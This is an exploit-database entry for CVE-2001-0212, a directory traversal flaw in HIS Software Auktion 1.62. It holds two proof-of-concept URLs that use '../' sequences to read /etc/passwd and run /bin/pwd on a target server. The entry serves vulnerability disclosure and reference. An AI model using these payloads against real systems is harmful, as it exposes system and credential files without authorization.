[] NeoSense

his software auktion 1.62 - Directory Traversal

Author: cuctema
type: remote
platform: windows
port: 
date_added: 2001-02-12 
date_updated: 2012-08-18 
verified: 1 
codes: CVE-2001-0212;OSVDB-527 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/2367/info

A remote user could gain read access to known files outside of the root directory where HIS Software Auktion 1.62 resides. Requesting a specially crafted URL composed of '../' sequences along with the known filename will disclose the requested file. This vulnerability could also lead to the execution of arbitrary code.

http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../bin/pwd

http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../etc/passwd